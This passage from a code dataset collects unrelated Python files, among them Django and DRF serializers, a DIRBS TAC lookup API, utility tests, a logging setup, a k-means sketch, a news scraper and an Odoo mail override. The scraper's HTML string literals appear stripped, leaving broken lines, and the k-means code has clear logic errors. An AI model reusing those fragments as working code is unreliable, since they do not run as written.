frame3['Ohio'][:-1],\n 'Nevada': frame3['Nevada'][:2]}\nDataFrame(pdata)\n\nframe3.index.name = 'year'; frame3.columns.name = 'state'\nframe3\n\nframe3.values\n\nframe2.values\n","sub_path":"ch05/5-1.py","file_name":"5-1.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"598713668","text":"from rest_framework import serializers\n\nfrom assessment.serializers import AssessmentMiniSerializer\nfrom utils.helper import SerializerHelper\n\nfrom myuser.serializers import HAWCUserSerializer\nfrom . import models\n\n\nclass AssessmentMetricChoiceSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = models.RiskOfBiasMetric\n fields = ('id', 'name', 'description')\n\n\nclass AssessmentMetricSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = models.RiskOfBiasMetric\n fields = '__all__'\n\n\nclass AssessmentDomainSerializer(serializers.ModelSerializer):\n metrics = AssessmentMetricSerializer(many=True)\n\n class Meta:\n model = models.RiskOfBiasDomain\n fields = '__all__'\n\n\nclass RiskOfBiasDomainSerializer(serializers.ModelSerializer):\n assessment = AssessmentMiniSerializer(read_only=True)\n\n class Meta:\n model = models.RiskOfBiasDomain\n fields = '__all__'\n\n\nclass RiskOfBiasMetricSerializer(serializers.ModelSerializer):\n domain = RiskOfBiasDomainSerializer(read_only=True)\n\n class Meta:\n model = models.RiskOfBiasMetric\n fields = '__all__'\n\n\nclass RiskOfBiasScoreSerializer(serializers.ModelSerializer):\n metric = RiskOfBiasMetricSerializer(read_only=True)\n\n def to_representation(self, instance):\n ret = super().to_representation(instance)\n ret['score_description'] = instance.get_score_display()\n ret['score_symbol'] = instance.score_symbol\n ret['score_shade'] = instance.score_shade\n ret['url_edit'] = instance.riskofbias.get_edit_url()\n ret['study_name'] = instance.riskofbias.study.short_citation\n ret['study_id'] = instance.riskofbias.study.id\n ret['study_types'] = instance.riskofbias.study.get_study_type()\n return ret\n\n class Meta:\n model = models.RiskOfBiasScore\n fields = ('id', 'score', 'notes', 'metric')\n\n\nclass RiskOfBiasSerializer(serializers.ModelSerializer):\n scores = RiskOfBiasScoreSerializer(read_only=False, many=True, partial=True)\n author = HAWCUserSerializer(read_only=True)\n\n class Meta:\n model = models.RiskOfBias\n fields = ('id', 'author', 'active',\n 'final', 'study', 'created',\n 'last_updated', 'scores')\n\n def update(self, instance, validated_data):\n \"\"\"\n Updates the nested RiskOfBiasScores with submitted data before updating\n the RiskOfBias instance.\n \"\"\"\n score_data = validated_data.pop('scores')\n for score, form_data in zip(instance.scores.all(), score_data):\n for field, value in list(form_data.items()):\n setattr(score, field, value)\n score.save()\n return super().update(instance, validated_data)\n\n\nclass AssessmentMetricScoreSerializer(serializers.ModelSerializer):\n scores = serializers.SerializerMethodField('get_final_score')\n\n class Meta:\n model = models.RiskOfBiasMetric\n fields = ('id', 'name', 'description', 'scores')\n\n def get_final_score(self, instance):\n scores = instance.scores.filter(riskofbias__final=True, riskofbias__active=True)\n serializer = RiskOfBiasScoreSerializer(scores, many=True)\n return serializer.data\n\n\nclass AssessmentRiskOfBiasScoreSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = models.RiskOfBiasScore\n fields = ('id', 'notes', 'score')\n\nSerializerHelper.add_serializer(models.RiskOfBias, RiskOfBiasSerializer)\n","sub_path":"project/riskofbias/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"273272631","text":"\"\"\"\nDIRBS REST-ful TAC API module.\n\nCopyright (c) 2018 Qualcomm Technologies, Inc.\n\n All rights reserved.\n\n\n\n Redistribution and use in source and binary forms, with or without modification, are permitted (subject to the\n limitations in the disclaimer below) provided that the following conditions are met:\n\n\n * Redistributions of source code must retain the above copyright notice, this list of conditions and the following\n disclaimer.\n\n * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following\n disclaimer in the documentation and/or other materials provided with the distribution.\n\n * Neither the name of Qualcomm Technologies, Inc. nor the names of its contributors may be used to endorse or promote\n products derived from this software without specific prior written permission.\n\n NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY\n THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR\n TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\nfrom flask import abort, jsonify\nfrom marshmallow import Schema, fields, pre_dump\n\nfrom dirbs.api.common.db import get_db_connection\n\n\ndef api(tac):\n \"\"\"TAC API endpoint (version 1).\"\"\"\n if len(tac) != 8:\n abort(400, 'Bad TAC format')\n\n try:\n int(tac)\n except ValueError:\n abort(400, 'Bad TAC format')\n\n with get_db_connection() as db_conn, db_conn.cursor() as cursor:\n cursor.execute('SELECT * FROM gsma_data WHERE tac = %s', [tac])\n rec = cursor.fetchone()\n\n if rec is None:\n return jsonify(GSMATacInfo().dump(dict(tac=tac, gsma=None)).data)\n return jsonify(GSMATacInfo().dump(dict(tac=tac, gsma=rec._asdict())).data)\n\n\nclass TacApi:\n \"\"\"TAC API version 2 methods.\"\"\"\n\n @staticmethod\n def _validate_tac(val):\n \"\"\"Validate TAC input argument format.\"\"\"\n if len(val) != 8:\n abort(400, 'Bad TAC format')\n\n try:\n int(val)\n except ValueError:\n abort(400, 'Bad Tac format')\n\n def get(self, tac):\n \"\"\"TAC GET API endpoint (version 2).\"\"\"\n self._validate_tac(tac)\n with get_db_connection() as db_conn, db_conn.cursor() as cursor:\n cursor.execute(\"\"\"SELECT tac, manufacturer, bands, allocation_date, model_name, device_type,\n optional_fields\n FROM gsma_data\n WHERE tac = %s\"\"\", [tac])\n gsma_data = cursor.fetchone()\n print(gsma_data)\n return jsonify(TacInfo().dump(dict(tac=tac,\n gsma=gsma_data._asdict() if gsma_data is not None else None)).data)\n\n def post(self, **kwargs):\n \"\"\"TAC POST API endpoint (version 2).\"\"\"\n if kwargs is not None:\n tacs = kwargs.get('tacs')\n if tacs is not None:\n tacs = list(set(tacs))\n else:\n abort(400, 'Bad TAC Input format.')\n\n if tacs is not None:\n if not len(tacs) > 1000 and not len(tacs) == 0:\n with get_db_connection() as db_conn, db_conn.cursor() as cursor:\n cursor.execute(\"\"\"SELECT tac, manufacturer, bands, allocation_date, model_name, device_type,\n optional_fields\n FROM gsma_data\n WHERE tac IN %(tacs)s\"\"\", {'tacs': tuple(tacs)})\n gsma_data = cursor.fetchall()\n response = []\n for rec in gsma_data:\n response.append(TacInfo().dump(dict(tac=rec.tac,\n gsma=rec._asdict())).data)\n existing_tacs = [res['tac'] for res in response]\n for tac in tacs:\n if tac not in existing_tacs:\n response.append(TacInfo().dump(dict(tac=tac, gsma=None)).data)\n return jsonify({'results': response})\n abort(400, 'Bad TAC Input format (Minimum 1 & Maximum 1000 allowed).')\n abort(400, 'Bad TAC Input format.')\n abort(400, 'Bad TAC Input format.')\n\n\nclass GSMA(Schema):\n \"\"\"Defines the GSMA schema for API V1.\"\"\"\n\n marketing_name = fields.String()\n internal_model_name = fields.String()\n manufacturer = fields.String()\n bands = fields.String()\n allocation_date = fields.String()\n country_code = fields.String()\n fixed_code = fields.String()\n manufacturer_code = fields.String()\n radio_interface = fields.String()\n brand_name = fields.String()\n model_name = fields.String()\n operating_system = fields.String()\n nfc = fields.String()\n bluetooth = fields.String()\n wlan = fields.String()\n device_type = fields.String()\n\n @pre_dump(pass_many=False)\n def extract_fields(self, data):\n \"\"\"Flatten the optional_fields to schema fields.\"\"\"\n for key in data['optional_fields']:\n data[key] = data['optional_fields'][key]\n\n\nclass GSMAV2(Schema):\n \"\"\"Defines the GSMA schema for API V2.\"\"\"\n\n allocation_date = fields.String()\n bands = fields.String()\n brand_name = fields.String()\n device_type = fields.String()\n internal_model_name = fields.String()\n manufacturer = fields.String()\n marketing_name = fields.String()\n model_name = fields.String()\n bluetooth = fields.String()\n nfc = fields.String()\n wlan = fields.String()\n radio_interface = fields.String()\n\n @pre_dump(pass_many=False)\n def extract_fields(self, data):\n \"\"\"Map optional fields to corresponding schema fields.\"\"\"\n for key in data['optional_fields']:\n data[key] = data['optional_fields'][key]\n\n\nclass GSMATacInfo(Schema):\n \"\"\"Defines the schema for TAC API(version 1) response.\"\"\"\n\n tac = fields.String(required=True)\n gsma = fields.Nested(GSMA, required=True)\n\n\nclass TacInfo(Schema):\n \"\"\"Defines the schema for TAC API(version 2) response.\"\"\"\n\n tac = fields.String(required=True)\n gsma = fields.Nested(GSMAV2, required=True)\n\n\nclass BatchTacInfo(Schema):\n \"\"\"Defines schema for Batch TAC API version 2 response.\"\"\"\n\n results = fields.List(fields.Nested(TacInfo, required=True))\n\n\nclass TacArgs(Schema):\n \"\"\"Input args for TAC POST API (version 2).\"\"\"\n\n # noinspection PyProtectedMember\n tacs = fields.List(fields.String(required=True, validate=TacApi._validate_tac))\n\n @property\n def fields_dict(self):\n \"\"\"Convert declared fields to dictionary.\"\"\"\n return self._declared_fields\n","sub_path":"src/dirbs/api/common/tac.py","file_name":"tac.py","file_ext":"py","file_size_in_byte":7407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"135780051","text":"import re\n\nimport bel.utils as utils\n\n\ndef test_get_url():\n\n url = \"https://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=pubmed&retmode=xml&id=19894120\"\n\n # with pytest.raises(requests.exceptions.Timeout):\n # r = utils.get_url(url, timeout=0.0001)\n\n r = utils.get_url(url)\n r = utils.get_url(url)\n assert r.from_cache\n\n\ndef test_first_true():\n\n test1 = [False, 1, \"2\", None]\n test2 = [None, \"\", \"2\", None]\n test3 = [None, False, \"\"]\n\n result = utils.first_true(test1)\n assert result == 1\n\n result = utils.first_true(test2)\n assert result == \"2\"\n\n # Result is the default value '3'\n result = utils.first_true(test3, \"3\")\n assert result == \"3\"\n\n\ndef test_create_hash():\n\n h = utils._create_hash(\"test\")\n assert h == \"8581389452482819506\"\n\n\ndef test_generate_id():\n\n _id = utils._generate_id()\n assert re.match(\"\\w{26,26}\", str(_id))\n","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"191354723","text":"\"\"\"\n给定一个排序数组和一个目标值,在数组中找到目标值,并返回其索引。如果目标值不存在于数组中,返回它将会被按顺序插入的位置。\n你可以假设数组中无重复元素。\n\n示例 1:\n输入: [1,3,5,6], 5\n输出: 2\n\n示例 2:\n输入: [1,3,5,6], 2\n输出: 1\n\n示例 3:\n输入: [1,3,5,6], 7\n输出: 4\n\n示例 4:\n输入: [1,3,5,6], 0\n输出: 0\n\"\"\"\n\n\nclass Solution:\n def searchInsert(self, nums: List[int], target: int) -> int:\n start = 0\n end = len(nums) - 1\n while start <= end:\n mid = start + (end - start) // 2\n if target < nums[mid]:\n if mid == 0 or target > nums[mid - 1]:\n return mid\n else:\n end = mid - 1\n elif target > nums[mid]:\n if mid == len(nums) - 1 or target < nums[mid + 1]:\n return mid + 1\n else:\n start = mid + 1\n else:\n return mid\n\n","sub_path":"LeedCode/二分搜索/35. 搜索插入位置.py","file_name":"35. 搜索插入位置.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"371550818","text":"import logging.handlers\nimport os\n\n# log文件位置\nlog_path = \"./Log\" + os.sep + \"hmx.log\"\n\n\ndef log_config():\n \"\"\"初始化日志配置\"\"\"\n # 日志器\n logger = logging.getLogger()\n # 设置级别\n logger.setLevel(logging.INFO)\n\n # 处理器 -控制台\n sh = logging.StreamHandler()\n # 处理器 -文件\n trf = logging.handlers.TimedRotatingFileHandler(filename=log_path, when=\"midnight\",\n interval=1, backupCount=7, encoding=\"utf-8\")\n # 格式化字符串\n fmt = \"%(asctime)s - %(levelname)s- [%(filename)s -%(lineno)d -%(funcName)s ] -%(message)s \"\n # 格式化器\n formatter = logging.Formatter(fmt)\n\n # 处理器-控制台 添加 格式化器\n sh.setFormatter(formatter)\n # 处理器-文件 添加 格式化器\n trf.setFormatter(formatter)\n\n # 日志器 添加 处理器-控制台\n logger.addHandler(sh)\n # 日志器 添加 处理器-文件\n logger.addHandler(trf)\n","sub_path":"Utils/logConf.py","file_name":"logConf.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"430279029","text":"\nimport webapp2\nfrom webapp2_extras import json\nimport logging\nfrom google.appengine.api import datastore\nfrom google.appengine.ext import ndb\nfrom dbentities import *\n\n\nclass MoveHandler(webapp2.RequestHandler):\n\tdef post(self):\n\t\tlogging.info(\" <<<<<<<<< POST, MoveHandler >>>>>>>>>>>>>\")\n\n\t\trb_dict = json.decode(self.request.body)\n\t\tmsg = \"big game exists\" + str(rb_dict.get('game').get('id'))\n\t\t# rb_dict.get('game').get('message') = \"back from server\"\n\t\trb_dict['game']['message'] = \"back from server\"\n\n\n\n\t\tq = Game.query(Game.gameid == rb_dict['game']['id'])\n\t\tqfetch = q.fetch()\n\t\tif len(qfetch) == 0:\n\t\t\tlogging.info(\"qfetch == 0\")\n\t\t\tgameObj = Game()\n\t\t\tgameObj.gameid = rb_dict['game']['id']\n\t\t\tgameObj.turn = rb_dict['game']['turn']\n\t\t\tgameObj.turnnum = rb_dict['game']['turnnum']\n\t\t\tgameObj.wplayer = rb_dict['game']['wplayer']\n\t\t\tgameObj.bplayer = rb_dict['game']['bplayer']\n\t\t\tgameObj.game = rb_dict['game']\n\t\telse:\n\t\t\tlogging.info(\"qfetch != 0\")\n\t\t\tgameObj = qfetch[0]\n\t\t\tgameObj.turn = rb_dict['game']['turn']\n\t\t\tgameObj.turnnum = rb_dict['game']['turnnum']\n\t\t\tgameObj.game = rb_dict['game']\n\n\t\tgameObj.state = gameObj.turn\n\t\tgameObj.put()\n\n\t\trspObj = {\n\t\t\t\t'rsp' : 'ok',\n\t\t\t\t'msg': msg\n\t\t\t}\n\t\t# assemble and send the response \n\t\tself.response.content_type = 'application/json'\n\t\tself.response.write(json.encode(rb_dict))\n","sub_path":"gameservice/move.py","file_name":"move.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"230052706","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\n# pip install requests\r\n# pip install bs4\r\n\r\ndef getAllCategoryLinks():\r\n returnMap = {}\r\n r = requests.get('https://www.blocktempo.com/')\r\n soup = BeautifulSoup(r.text, 'html.parser')\r\n menus = soup.select('ul[class=\"sub-menu\"] li')\r\n for menu in menus:\r\n returnMap[menu.get_text()] = menu.select('a')[0].get('href')\r\n return returnMap\r\n\r\ndef crawl(categoryName, categoryLink):\r\n f = open(categoryName+'.csv', 'a', encoding=\"utf8\")\r\n r = requests.get(categoryLink)\r\n soup = BeautifulSoup(r.text, 'html.parser')\r\n page_number = int(soup.select('a[class=\"page_number\"]')[-1].get_text())\r\n for page in range(1, page_number+1):\r\n r = requests.get(categoryLink+'page/'+str(page))\r\n soup = BeautifulSoup(r.text, 'html.parser')\r\n postElements = soup.select('article[class=\"jeg_post jeg_pl_lg_2 format-standard\"]')\r\n for post in postElements:\r\n title = post.select('h3[class=\"jeg_post_title\"]')[0].get_text().replace('\\n', '')\r\n publishDate = post.select('div[class=\"jeg_meta_date\"]')[0].get_text()\r\n author = post.select('div[class=\"jeg_meta_author\"] a')[0].get_text()\r\n #print(title+','+publishDate+','+author)\r\n f.write(publishDate+','+author+','+title+'\\n')\r\n f.flush()\r\n f.close()\r\n\r\nreturnMap = getAllCategoryLinks()\r\nfor key in returnMap.keys():\r\n crawl(key, returnMap[key])","sub_path":"news_title.py","file_name":"news_title.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"460702523","text":"import pickle\nfrom math import sqrt\nimport numpy as np\n\n\n#with open('./data/data.pkl', 'rb') as f:\n# points_list = pickle.load(f)\n\n#test points tuple imported with pickle\n#points_list = [(-107, 630), (-790, -305), (-564, -387), (-181, -68), (330, -474), (-295, -803), (407, -920), (-640, 20), (943, 177), (428, -391), (-62, -335), (964, -98), (-306, -540), (-103, -979), (393, 208), (-94, -689), (497, -273), (201, 903), (965, 416), (-204, -928), (-809, -521), (116, -442), (56, 292), (-1, -604), (-241, 54), (-473, -996), (-61, -70), (-496, -354), (443, 539), (-786, 905), (620, 581), (-547, 588), (320, 102), (643, 964), (-696, 219), (-449, -941), (685, 640), (-763, -178), (120, 638), (-419, -894), (826, -216), (-583, -731), (-909, 170), (848, -749), (156, 946), (595, -172), (436, 93), (561, 48), (535, -868), (-507, 424)]\n\n\n# We first need to define a Point class with all the operations of a 3D point.\nclass Point(object):\n\n def __init__(self, x, y, z):\n self.x = x\n self.y = y\n self.z = z\n\n def __repr__(self):\n return 'Point(%s, %s, %s)' % (self.x,self.y,self.z)\n\n def __add__(self, point):\n\n return Point(self.x + point.x, self.y + point.y, self.z + point.z)\n\n def __sub__ (self, point):\n\n return Point(self.x - point.x, self.y - point.y, self.z - point.z)\n\n def __mul__ (self, p):\n if type(p) == int or type(p) == float:\n return Point(p*self.x, p*self.y, p*self.z)\n if type (p) == Point:\n return int((self.x * p.x) + (self.y*p.y) + (self.z*p.z))\n\n def distance (self, other):\n\n return sqrt((self.x - other.x)**2 +(self.y - other.y)**2 + (self.z - other.z)**2)\n\n\nclass Cluster(object):\n def __init__(self, x, y, z):\n self.center = Point(x, y, z)\n self.points = []\n\n def update(self):\n temp = Point(0, 0, 0)\n for point in self.points:\n temp += point\n self.center = temp * (1/float(len(self.points)))\n self.points = []\n\n\n def add_point(self, point):\n self.points.append(point)\n\n# We convert the list of tuples representing points to a list of Point Objects.\n#points = [Point(points_list[i][0],points_list[i][1]) for i in range(len(points_list))]\n\ndef basic_knn(X, nclusters):\n clusters = []\n for i in range(nclusters):\n index = np.random.choice(X.shape[0], 2, replace=False)\n clusters.append(Cluster(X[index]))\n\n _old = []\n dist_list = []\n for _ in range(10000): # max iterations\n for point in X:\n\n for cluster in clusters:\n dist_list.append(point.distance(cluster.center))\n\n min_index = dist_list.index(min(dist_list))\n cluster[min_index].add_point(point)\n\n\n if _old == clusters[0].points:\n break\n _old = []\n for cluster in clusters:\n cluster.update()\n\n\n return [cluster.center for cluster in clusters]\n","sub_path":"clust.py","file_name":"clust.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"508963529","text":"# Imports\nfrom flask import Blueprint, jsonify, request\nfrom services.alimentacao_services import \\\n listar as service_listar_alimentacao, \\\n localizar as service_localiza_alimentacao\n\ncoel_alimentacao = Blueprint('coel_alimentacao', __name__)\n\n\n@coel_alimentacao.route('/alimentacao')\ndef listar_alimentacao():\n lista = service_listar_alimentacao()\n return jsonify(lista)\n\n\n@coel_alimentacao.route('/alimentacao/', methods=['GET'])\ndef localizar_alimentacao(id):\n alimentacao = service_localiza_alimentacao(id)\n if alimentacao is not None:\n return jsonify(alimentacao)\n return jsonify({'erro': 'alimentacao nao encontrado'}), 400\n","sub_path":"Backend/routes/routes_alimentacao.py","file_name":"routes_alimentacao.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"67835573","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 2017年5月10日\n\n@author: chenyitao\n'''\n\nfrom libsvm.svmutil import *\nfrom .learn_helper import LearnHelper\n\n\nclass IdentityHelper(object):\n\n models = {}\n\n @staticmethod\n def get_feature(filename, default_size=(12, 20), threshold=140):\n sub_imgs = LearnHelper.cut_image(filename, default_size, threshold)\n name = filename.split('/')[-1].split('.')[0]\n yt = []\n xt = []\n for index, sub_img in enumerate(sub_imgs):\n label = ord(name[index]) * 1.0 \\\n if len(name) > index and ord(name[index]) >= 97 \\\n else int(name[index]) * 1.0\n yt.append(label)\n feature = LearnHelper.get_feature(sub_img)\n xt.append({j + 1: f * 1.0 for j, f in enumerate(feature)})\n return yt, xt\n\n @staticmethod\n def get_model(model_file):\n model = IdentityHelper.models.get(model_file, None)\n if not model:\n model = svm_load_model(model_file)\n IdentityHelper.models[model_file] = model\n return model\n\n @staticmethod\n def identify(filename, model_file, default_size=(12, 20), threshold=140):\n yt, xt = IdentityHelper.get_feature(filename, default_size, threshold)\n model = IdentityHelper.get_model(model_file)\n p_label, (acc, _, _), _ = svm_predict(yt, xt, model)\n result = ''\n if int(acc) < 100:\n return ''\n for item in p_label:\n if int(item) >= 97:\n result += chr(int(item))\n else:\n result += str(int(item))\n return result\n","sub_path":"tools/captcha_identity/helper/identity_helper.py","file_name":"identity_helper.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"273035994","text":"from django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.decorators import api_view\nimport json\nfrom datetime import datetime\nfrom django.shortcuts import render\nfrom user.data.request.user_request import UserRequest\nfrom user.service.user_service import User_Service\nimport pytz\nIST = pytz.timezone('Asia/Kolkata')\ndatetime_ist = datetime.now(IST)\ntoday = datetime_ist.strftime('%Y-%m-%d')\n\ndef login_index(request):\n return render(request, 'login.html')\n\ndef signup_index(request):\n return render(request, 'signup.html')\n\n@csrf_exempt\n@api_view(['GET','POST'])\ndef user_fetch(request):\n if request.method == 'GET':\n User_service = User_Service()\n resp_obj = User_service.get_user()\n return HttpResponse(resp_obj.get(), content_type='application/json')\n\n if request.method == 'POST':\n userdata = json.loads(request.body)\n User_service = User_Service()\n data = UserRequest(userdata)\n resp_obj = User_service.insert_user(data,userdata)\n return HttpResponse(resp_obj.get(), content_type='application/json')\n\n@csrf_exempt\n@api_view(['GET'])\ndef user_detail(request,userid):\n if request.method == 'GET':\n User_service = User_Service()\n resp_obj = User_service.get_userdetail(userid)\n return HttpResponse(resp_obj.get(), content_type='application/json')\n\n\n@csrf_exempt\n@api_view(['POST'])\ndef user_login(request):\n if request.method == 'POST':\n userdata = json.loads(request.body)\n User_service = User_Service()\n username= userdata['username']\n password= userdata['password']\n resp_obj = User_service.login_user(username, password)\n data = json.loads(resp_obj.get())\n request.session['empid'] = data.get('message').get('id')\n request.session['empname'] = data.get('message').get('name')\n # request.session['Entity_gid'] = data.data.message.get(id)\n return HttpResponse(resp_obj.get(), content_type='application/json')\n","sub_path":"user/controller/usercontroller.py","file_name":"usercontroller.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"165854002","text":"# Tai Nguyen, Matthew Lisec and Yong Jiang\r\n\r\nimport urllib\r\n# create awesome html\r\ndef openHtml():\r\n return open('C:/Users/lisec/OneDrive/Documents/CST 205/Lab 16/awesome.html', 'wt')\r\n# create new html news\r\ndef createNewHTML():\r\n return open('C:/Users/lisec/OneDrive/Documents/CST 205/Lab 16/mynews.html', 'wt')\r\n\r\ndef main():\r\n\r\n # get html from site\r\n html = urllib.urlopen(\"https://techcrunch.com\")\r\n \r\n # get file to write the news in\r\n file = openHtml()\r\n file.write(html.read())\r\n # save the file\r\n file.close()\r\n \r\n # open the news file\r\n file = open('C:/Users/lisec/OneDrive/Documents/CST 205/Lab 16/awesome.html')\r\n # create a new html file contain parsed news\r\n newFile = createNewHTML();\r\n # write html and head for html\r\n newFile.write('I made this page with Python!')\r\n # loops to all line in html\r\n for new in file:\r\n # split to remove all spaces\r\n newArray = new.split()\r\n # if length of newSplit is more than 2\r\n if len(newArray) > 2:\r\n # condition check for title of news\r\n if newArray[0] == '', '').replace(' ', ' ').replace('’', \"'\")\r\n # write to html\r\n newFile.write('

' + title + '

')\r\n # get description of new\r\n if newArray[0] == '')\r\n # close and save news html\r\n newFile.close()\r\n ","sub_path":"CST205/Lab 16/lab16.py","file_name":"lab16.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"306162974","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport base64\nimport re\nimport requests\nimport json\n\nfrom odoo import _, api, fields, models, SUPERUSER_ID, tools\nfrom odoo.tools.safe_eval import safe_eval\nfrom odoo.exceptions import UserError\n\n_logger = logging.getLogger(__name__)\n\nclass mail_custom_0(models.TransientModel):\n\n _inherit = 'mail.compose.message'\n\n\n def get_mail_values(self, res_ids):\n \"\"\"Generate the values that will be used by send_mail to create mail_messages\n or mail_mails. \"\"\"\n self.ensure_one()\n results = dict.fromkeys(res_ids, False)\n rendered_values = {}\n mass_mail_mode = self.composition_mode == 'mass_mail'\n\n # render all template-based value at once\n if mass_mail_mode and self.model:\n rendered_values = self.render_message(res_ids)\n # compute alias-based reply-to in batch\n reply_to_value = dict.fromkeys(res_ids, None)\n if mass_mail_mode and not self.no_auto_thread:\n records = self.env[self.model].browse(res_ids)\n reply_to_value = self.env['mail.thread']._notify_get_reply_to_on_records(default=self.email_from, records=records)\n\n blacklisted_rec_ids = []\n if mass_mail_mode and issubclass(type(self.env[self.model]), self.pool['mail.thread.blacklist']):\n BL_sudo = self.env['mail.blacklist'].sudo()\n blacklist = set(BL_sudo.search([]).mapped('email'))\n if blacklist:\n targets = self.env[self.model].browse(res_ids).read(['email_normalized'])\n # First extract email from recipient before comparing with blacklist\n blacklisted_rec_ids.extend([target['id'] for target in targets\n if target['email_normalized'] and target['email_normalized'] in blacklist])\n\n for res_id in res_ids:\n # static wizard (mail.message) values\n \n ##########################\n reply_follower = \"\"\n # ADD REPLY FOLLOWERS\n if(self.model == 'sale.order'):\n sale_order = self.env['sale.order'].search([('id','=', self.res_id)])\n \n emails_follower = []\n if(sale_order.message_follower_ids):\n for partner in sale_order.message_follower_ids.partner_id:\n if(partner.email):\n emails_follower.append(partner.email)\n\n if(emails_follower):\n reply_follower = ','.join(emails_follower)\n \n ##########################\n\n mail_values = {\n 'subject': self.subject,\n 'body': self.body or '',\n 'parent_id': self.parent_id and self.parent_id.id,\n 'partner_ids': [partner.id for partner in self.partner_ids],\n 'attachment_ids': [attach.id for attach in self.attachment_ids],\n 'author_id': self.author_id.id,\n 'email_from': self.email_from,\n 'record_name': self.record_name,\n 'no_auto_thread': self.no_auto_thread,\n 'mail_server_id': self.mail_server_id.id,\n 'mail_activity_type_id': self.mail_activity_type_id.id,\n 'reply_to': reply_follower ###########################\n }\n\n # mass mailing: rendering override wizard static values\n if mass_mail_mode and self.model:\n record = self.env[self.model].browse(res_id)\n mail_values['headers'] = record._notify_email_headers()\n # keep a copy unless specifically requested, reset record name (avoid browsing records)\n mail_values.update(notification=not self.auto_delete_message, model=self.model, res_id=res_id, record_name=False)\n # auto deletion of mail_mail\n if self.auto_delete or self.template_id.auto_delete:\n mail_values['auto_delete'] = True\n # rendered values using template\n email_dict = rendered_values[res_id]\n mail_values['partner_ids'] += email_dict.pop('partner_ids', [])\n mail_values.update(email_dict)\n if not self.no_auto_thread:\n mail_values.pop('reply_to')\n if reply_to_value.get(res_id):\n mail_values['reply_to'] = reply_to_value[res_id]\n if self.no_auto_thread and not mail_values.get('reply_to'):\n mail_values['reply_to'] = mail_values['email_from']\n # mail_mail values: body -> body_html, partner_ids -> recipient_ids\n mail_values['body_html'] = mail_values.get('body', '')\n mail_values['recipient_ids'] = [(4, id) for id in mail_values.pop('partner_ids', [])]\n\n # process attachments: should not be encoded before being processed by message_post / mail_mail create\n mail_values['attachments'] = [(name, base64.b64decode(enc_cont)) for name, enc_cont in email_dict.pop('attachments', list())]\n attachment_ids = []\n for attach_id in mail_values.pop('attachment_ids'):\n new_attach_id = self.env['ir.attachment'].browse(attach_id).copy({'res_model': self._name, 'res_id': self.id})\n attachment_ids.append(new_attach_id.id)\n attachment_ids.reverse()\n mail_values['attachment_ids'] = self.env['mail.thread']._message_post_process_attachments(\n mail_values.pop('attachments', []),\n attachment_ids,\n {'model': 'mail.message', 'res_id': 0}\n )['attachment_ids']\n # Filter out the blacklisted records by setting the mail state to cancel -> Used for Mass Mailing stats\n if res_id in blacklisted_rec_ids:\n mail_values['state'] = 'cancel'\n # Do not post the mail into the recipient's chatter\n mail_values['notification'] = False\n\n results[res_id] = mail_values\n return results\n\n @api.onchange('template_id')\n def onchange_template_id_wrapper(self):\n self.ensure_one()\n values = self.onchange_template_id(self.template_id.id, self.composition_mode, self.model, self.res_id)['value']\n for fname, value in values.items():\n 